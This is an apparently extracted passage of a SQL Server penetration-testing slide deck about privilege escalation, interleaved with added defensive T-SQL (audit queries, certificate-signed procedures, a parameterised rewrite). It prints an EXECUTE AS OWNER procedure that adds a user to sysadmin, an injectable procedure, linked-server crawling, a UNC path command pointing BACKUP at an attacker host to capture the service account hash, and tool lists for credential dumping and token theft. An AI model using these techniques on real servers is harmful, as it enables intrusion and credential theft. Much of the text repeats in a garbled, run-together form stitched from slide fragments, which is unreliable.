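    (3, N'order-2024-000123');     -- an identifier that is not a card number
SELECT id, col_value, dbo.fn_luhn_valid(col_value) AS luhn_valid FROM @sample;
-- On a real schema, feed this TOP (100) sampled values from each column whose
-- name matches keywords such as card, pan or acct, and review only the rows flagged 1.
```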
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires database to be configured as trustworthy for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner
USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser', 'sysadmin'
GO
SYSADMIN is often the OWNER
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• Use signed procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certificate
o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
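The seven signing steps above carried out in T-SQL, as an added example (not from the deck or from PowerUpSQL) of the alternative to the EXECUTE AS OWNER pattern in sp_escalate_me: the procedure gets exactly one server-level permission without IMPERSONATE and without TRUSTWORTHY. It assumes MyAppUser exists as a login with a user in MyAppDb; certificate names, passwords and the export path are placeholders.

```sql
-- Added example, not from the deck or PowerUpSQL. Certificate/login names, passwords
-- and the export path are constructed; MyAppDb and MyAppUser are the deck's names.

-- Step 1: the procedure. Listing every database needs VIEW ANY DATABASE at server
-- scope; without it MyAppUser sees only master, tempdb and databases it owns.
USE MyAppDb;
GO
CREATE PROCEDURE dbo.usp_list_database_names
AS
BEGIN
    SET NOCOUNT ON;
    SELECT name, state_desc FROM sys.databases;
END;
GO

-- Step 2: database master key, needed to protect the certificate's private key.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<strong DMK password placeholder>';
GO
-- Step 3: certificate in the same database as the procedure (ADD SIGNATURE needs that).
CREATE CERTIFICATE cert_usp_list_db WITH SUBJECT = 'Signs usp_list_database_names';
GO
-- Step 6, done here because the private key lives in this database: sign the procedure.
-- The signature is dropped automatically if the procedure is later ALTERed; re-sign it.
ADD SIGNATURE TO dbo.usp_list_database_names BY CERTIFICATE cert_usp_list_db;
GO
-- Export the public part only; master never needs the private key.
BACKUP CERTIFICATE cert_usp_list_db TO FILE = 'C:\placeholder\cert_usp_list_db.cer';
GO

-- Step 4: a login derived from the certificate. Nobody can authenticate as it; it
-- exists only to carry the server-level permission onto the signed procedure.
USE master;
GO
CREATE CERTIFICATE cert_usp_list_db FROM FILE = 'C:\placeholder\cert_usp_list_db.cer';
CREATE LOGIN cert_usp_list_db_login FROM CERTIFICATE cert_usp_list_db;
GO
-- Step 5: exactly the permission the procedure needs. Compare sp_escalate_me, where
-- the owner's whole privilege set (often sysadmin) applies to everything in the body.
GRANT VIEW ANY DATABASE TO cert_usp_list_db_login;
GO

-- Step 7: let the application user run it.
USE MyAppDb;
GO
GRANT EXECUTE ON dbo.usp_list_database_names TO MyAppUser;
GO
-- Check: the database is not TRUSTWORTHY, yet the procedure returns every database,
-- while MyAppUser itself still has no server-level rights outside this procedure.
SELECT name, is_trustworthy_on FROM sys.databases WHERE name = DB_NAME();
EXECUTE AS LOGIN = 'MyAppUser';
EXEC dbo.usp_list_database_names;
REVERT;
```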
Escalating Privileges: Impersonation
SQL Injection Example
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
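A hardened version of sp_sqli2 as an added example (not from the deck): the user value travels to sp_executesql as a typed parameter instead of being concatenated into the statement, and the second half shows QUOTENAME for the one case where dynamic SQL really is needed, a database name used as an identifier. The procedure name sp_sqli2_fixed is constructed.

```sql
-- Added example, not from the deck: sp_sqli2 rewritten so that @DbName can never
-- change the shape of the statement. The procedure name is constructed.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname              -- sysname (nvarchar(128)): a name is never longer, so
                                 -- varchar(max) only gave an injected payload more room
AS
BEGIN
    SET NOCOUNT ON;

    -- Case 1: the value is data (a LIKE pattern). Keep it out of the statement text
    -- entirely: the text is a constant that references a parameter, and sp_executesql
    -- binds @DbName to it. A quote or OR inside @DbName is just part of the pattern.
    DECLARE @stmt nvarchar(max) =
        N'SELECT name FROM master.sys.databases
           WHERE name LIKE N''%'' + @pattern + N''%'' OR name = N''tempdb'';';
    EXEC sys.sp_executesql @stmt, N'@pattern sysname', @pattern = @DbName;

    -- Case 2: the value must be an identifier, so dynamic SQL is unavoidable.
    -- Validate against the catalogue first, then wrap it in QUOTENAME so a name
    -- containing ] or ' still parses as one bracketed identifier.
    IF DB_ID(@DbName) IS NULL
        RETURN 1;   -- unknown database: refuse rather than guess
    DECLARE @stmt2 nvarchar(max) =
        N'SELECT COUNT(*) AS user_tables FROM ' + QUOTENAME(@DbName) + N'.sys.tables;';
    EXEC sys.sp_executesql @stmt2;
END;
GO

-- Regression check with the kind of input that breaks sp_sqli2: the first query
-- returns no rows (no database name contains that pattern) and DB_ID() returns NULL,
-- so the procedure exits with 1 instead of running an altered statement.
EXEC dbo.sp_sqli2_fixed @DbName = N'x'' OR 1=1--';
```

Because no statement text is built from user input, the procedure also no longer needs EXECUTE AS OWNER, which is what turned an injection in the original into the owner's (often sysadmin) privileges.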
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
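An added audit query (not from the deck or from PowerUpSQL) for the facts the list above turns on: which account runs this instance and whether it is a sysadmin login, plus whether the OS-command surface is enabled. Run it on every instance; the same domain account appearing across many instances is the finding.

```sql
-- Added example, not from the deck or PowerUpSQL. Needs VIEW SERVER STATE.

-- 1. Service accounts. A per-instance virtual account (NT SERVICE\...) or a managed
--    service account (name ending in $) cannot be reused across servers; a plain
--    DOMAIN\user account that shows up on many instances is the shared-account case.
SELECT  servicename,
        service_account,
        CASE WHEN service_account LIKE 'NT SERVICE\%'
               OR service_account LIKE 'NT AUTHORITY\%' THEN 'per-instance / built-in'
             WHEN service_account LIKE '%$'             THEN 'managed service account'
             ELSE 'user account: check how many instances share it'
        END AS account_kind,
        status_desc
FROM    sys.dm_server_services;

-- 2. Is the engine's service account a sysadmin login (point 3 above: yes by default)?
--    IS_SRVROLEMEMBER returns NULL when no login by that name exists on the instance.
SELECT  service_account,
        IS_SRVROLEMEMBER('sysadmin', service_account) AS is_sysadmin
FROM    sys.dm_server_services
WHERE   servicename LIKE 'SQL Server (%';

-- 3. OS command surface (1 = enabled). A sysadmin can turn these back on with
--    sp_configure, so treat this as an audit signal and a detection hook, not a boundary.
SELECT  name, CAST(value_in_use AS int) AS enabled
FROM    sys.configurations
WHERE   name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 4. Every member of sysadmin, so the service account and anything else sitting
--    in the role are reviewed together.
SELECT  m.name AS member, m.type_desc
FROM    sys.server_role_members rm
JOIN    sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN    sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE   r.name = 'sysadmin';
```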
[Figure: Leveraging Shared MS SQL Server Service Accounts. Network diagram with Internet, DMZ and Intranet zones; an external attacker ("Captain Evil", labelled PURE EVIL) reaches a Low Value Application (LVA) in the DMZ over ports 80 and 443, behind which sit intranet database servers (LRA, HVA, ADS) on ports 1433 and 1434. Build steps: 1 SQL Injection against the LVA; 2 Execute local command via xp_cmdshell; 3 Execute commands and gather data from other database servers via osql, giving access to the HVA with the shared domain service account. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the OWNER
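As an added audit example (not part of the deck or of PowerUpSQL), the following T-SQL lists the two conditions the sp_escalate_me slide relies on: databases that are TRUSTWORTHY and owned by a sysadmin, and modules that run as their owner. It only reads the catalog views, so a DBA can run it against any instance; the msdb exclusion is an assumption that msdb is TRUSTWORTHY by design.

```sql
-- Added example, not from the original deck. Reads only sys.* catalog views.

-- 1. Databases where EXECUTE AS OWNER reaches a sysadmin login AND the database is
--    TRUSTWORTHY, i.e. the combination that lets sp_escalate_me add a server role member.
SELECT d.name              AS database_name,
       sp.name             AS owner_login,
       d.is_trustworthy_on,
       IS_SRVROLEMEMBER('sysadmin', sp.name) AS owner_is_sysadmin
FROM sys.databases AS d
JOIN sys.server_principals AS sp ON sp.sid = d.owner_sid
WHERE d.is_trustworthy_on = 1
  AND IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
  AND d.name <> 'msdb';                 -- msdb ships TRUSTWORTHY on purpose; review the rest

-- 2. Procedures and triggers in the current database that run as someone other than
--    the caller, together with the principals allowed to execute them.
--    sys.sql_modules.execute_as_principal_id: NULL = CALLER, -2 = OWNER, else a user id.
SELECT QUOTENAME(SCHEMA_NAME(o.schema_id)) + '.' + QUOTENAME(o.name) AS module_name,
       o.type_desc,
       CASE m.execute_as_principal_id
            WHEN -2 THEN 'OWNER'
            ELSE USER_NAME(m.execute_as_principal_id)
       END AS executes_as,
       USER_NAME(p.grantee_principal_id) AS can_execute
FROM sys.sql_modules AS m
JOIN sys.objects     AS o ON o.object_id = m.object_id
LEFT JOIN sys.database_permissions AS p
       ON p.major_id = o.object_id
      AND p.permission_name = 'EXECUTE'
      AND p.state = 'G'
WHERE o.type IN ('P', 'TR')
  AND m.execute_as_principal_id IS NOT NULL
ORDER BY module_name;
```

A row from the first query whose owner is sa (the default owner of most databases) is exactly the "SYSADMIN is often the OWNER" case; either change the owner to a low-privileged login or turn TRUSTWORTHY off.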
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation Injection Issues
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
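The seven steps above carried through in T-SQL, as an added example that is not from the deck or from PowerUpSQL. It assumes a database MyAppDb with a database user MyAppUser, and the certificate, login, procedure and file path names are placeholders chosen for the example; the procedure needs VIEW SERVER STATE, which the certificate login lends it, while MyAppUser and the database owner are left alone and TRUSTWORTHY stays off.

```sql
-- Added example, not the deck's own code. Placeholder names: MyAppDb, MyAppUser,
-- SignedProcCert, SignedProcLogin, dbo.usp_active_sessions, <path>.
USE MyAppDb;
GO

-- Step 1: the procedure that needs more rights than its callers have.
-- No EXECUTE AS OWNER: it runs as the caller, and the signature (step 6) adds
-- the one permission it needs. Without VIEW SERVER STATE a caller only sees
-- their own session; with it the procedure returns every user session.
CREATE PROCEDURE dbo.usp_active_sessions
AS
BEGIN
    SET NOCOUNT ON;
    SELECT session_id, login_name, host_name, program_name, status
    FROM sys.dm_exec_sessions
    WHERE is_user_process = 1;
END;
GO

-- Step 2: database master key, which protects the certificate's private key.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<strong master key password>';
GO

-- Step 3: certificate that will sign the procedure (private key lives here, in MyAppDb).
CREATE CERTIFICATE SignedProcCert
    WITH SUBJECT = 'Signs dbo.usp_active_sessions';
GO

-- Step 6 (done here, while the private key is at hand): sign the procedure.
-- The signature covers the procedure text; any ALTER PROCEDURE drops it,
-- so injected or modified code does not inherit the lent permission.
ADD SIGNATURE TO dbo.usp_active_sessions BY CERTIFICATE SignedProcCert;
GO

-- Step 4: a server login mapped to the certificate. Only the public part of the
-- certificate is copied into master; the login needs nothing more.
BACKUP CERTIFICATE SignedProcCert TO FILE = '<path>\SignedProcCert.cer';
GO
USE master;
GO
CREATE CERTIFICATE SignedProcCert FROM FILE = '<path>\SignedProcCert.cer';
GO
CREATE LOGIN SignedProcLogin FROM CERTIFICATE SignedProcCert;
GO

-- Step 5: the login gets exactly the permission the procedure needs, nothing else.
-- Compare with EXECUTE AS OWNER, which hands over everything the owner holds.
GRANT VIEW SERVER STATE TO SignedProcLogin;
GO

-- Step 7: the application user may run the procedure. TRUSTWORTHY is not touched.
USE MyAppDb;
GO
GRANT EXECUTE ON dbo.usp_active_sessions TO MyAppUser;
GO

-- Check: which modules in this database carry a signature, and by which certificate.
-- A procedure that was altered after signing disappears from this list.
SELECT OBJECT_NAME(cp.major_id) AS module_name, c.name AS certificate_name
FROM sys.crypt_properties AS cp
JOIN sys.certificates     AS c ON c.thumbprint = cp.thumbprint
WHERE cp.class_desc = 'OBJECT_OR_COLUMN';
```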
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
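The same lookup that sp_sqli2 performs, rewritten so that the caller's text can only ever be data, as an added example that is not from the deck. Procedure and parameter names are placeholders; the shape of the statement is fixed, so a plain static query would also do, and the sp_executesql form is shown because it is the safe pattern for the cases that genuinely need dynamic SQL.

```sql
-- Added example, not the deck's own code. Placeholder name: dbo.usp_find_databases.
CREATE PROCEDURE dbo.usp_find_databases
    @DbName sysname                 -- bounded nvarchar(128) instead of varchar(max)
AS
BEGIN
    SET NOCOUNT ON;

    -- Build the LIKE pattern in T-SQL. Bracket-escape wildcard characters the caller
    -- may have typed so they match literally instead of widening the search.
    DECLARE @pattern nvarchar(400) =
        N'%' + REPLACE(REPLACE(REPLACE(@DbName, N'[', N'[[]'),
                                        N'%', N'[%]'),
                                N'_', N'[_]') + N'%';

    -- The statement text is a constant; the caller's value travels as a typed
    -- parameter. Quote characters in @DbName therefore never reach the parser,
    -- which is what sp_sqli2's string concatenation allowed.
    DECLARE @sql nvarchar(max) =
        N'SELECT name FROM master.sys.databases '
      + N'WHERE name LIKE @p OR name = N''tempdb'' ORDER BY name;';

    EXEC sys.sp_executesql @sql, N'@p nvarchar(400)', @p = @pattern;
END;
GO

-- Usage with a constructed input containing a quote, an underscore and a percent sign:
-- all three are searched for literally, and the query shape is unchanged.
EXEC dbo.usp_find_databases @DbName = N'App''s_Db%';
GO
```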
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server you have it on all of them
One account to rule them all
[Diagram: Leveraging Shared MS SQL Server Service Accounts. Network zones: Internet, DMZ, Intranet, with ports 80 and 443 open into the DMZ and ports 1433 and 1434 open into the intranet; nodes labelled LRA, HVA, LVA, LVA, ADS and "PURE EVIL" (Captain Evil). Key: HVA = High Value Application, LVA = Low Value Application. Steps shown: 1. SQL injection; 2. Execute local command via xp_cmdshell; 3. Access to HVA with shared domain service account, then execute commands and gather data from other database servers via osql.]
Escalating Privileges: Crawling SQL Server Links
Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
  SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Diagram: Leveraging MS SQL Database links. Same network zones, ports and key as the previous diagram. DB1 (LVA) is reached by SQL injection (1); from there a DB link with least privileges and a DB link with an SA account lead on to the other servers: 2. Execute SQL queries and local commands on database servers via nested linked services.]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we've seen
• The max number of hops we've seen is 12
• The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql/
Escalating Privileges: Crawling Server Links
Function / Description
Get-SQLServerLink: Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl: Crawls linked servers and supports SQL query and OS command execution
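For the defender, the question behind these slides is which links exist and under whose identity remote queries run. The catalog query below, an added example that is not from the deck or from PowerUpSQL, lists each linked server with its login mappings and a rough assessment; the severity labels are this example's own choices, and the default mapping row (local_principal_id = 0) is the one every local login, the public role included, falls through to.

```sql
-- Added example, not the deck's own code. Reads only sys.servers, sys.linked_logins
-- and sys.server_principals, so it needs no more than server catalog read access.
SELECT s.name                              AS linked_server,
       s.data_source,
       s.provider,
       s.is_rpc_out_enabled,              -- RPC Out: stored procedures can run remotely
       s.is_data_access_enabled,          -- required for OPENQUERY against the link
       ll.uses_self_credential,           -- 1 = caller's own Windows identity passes through
       ll.remote_name,                    -- fixed remote login stored for the mapping
       COALESCE(lp.name, '<all other logins>') AS local_login,
       CASE
            WHEN ll.uses_self_credential = 0 AND ll.remote_name = 'sa'
                 THEN 'HIGH: mapped callers reach the remote server as sa'
            WHEN ll.uses_self_credential = 0 AND ll.remote_name IS NOT NULL
                 AND ll.local_principal_id = 0
                 THEN 'REVIEW: every local login shares one stored remote credential'
            WHEN ll.uses_self_credential = 0 AND ll.remote_name IS NOT NULL
                 THEN 'REVIEW: fixed remote credential for this login'
            WHEN ll.uses_self_credential = 1
                 THEN 'OK: remote access limited to the caller''s own identity'
            ELSE 'INFO: no remote login stored for this mapping'
       END AS assessment
FROM sys.servers AS s
JOIN sys.linked_logins AS ll
       ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp
       ON lp.principal_id = ll.local_principal_id
      AND ll.local_principal_id <> 0     -- 0 is the default mapping, not a real principal
WHERE s.is_linked = 1
ORDER BY s.name, local_login;
```

Run it on every instance a crawl could reach, not just the entry point: the link that matters is usually two or three hops away.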
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands
  BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
  RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016
  https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive
Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges: OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options
Approach / Common Tools
Access as Local Administrator: Management Studio, sqlcmd, and other native SQL client tools
Access as LocalSystem: Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
Single User Mode: DBATools
Common Post Exploitation Activities
Post Exploitation: Overview
Common Post Exploitation Activities
1. Establish Persistence
• SQL Server Layer: startup procedures, agent jobs, triggers, modified code
• OS Layer: Registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
• All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
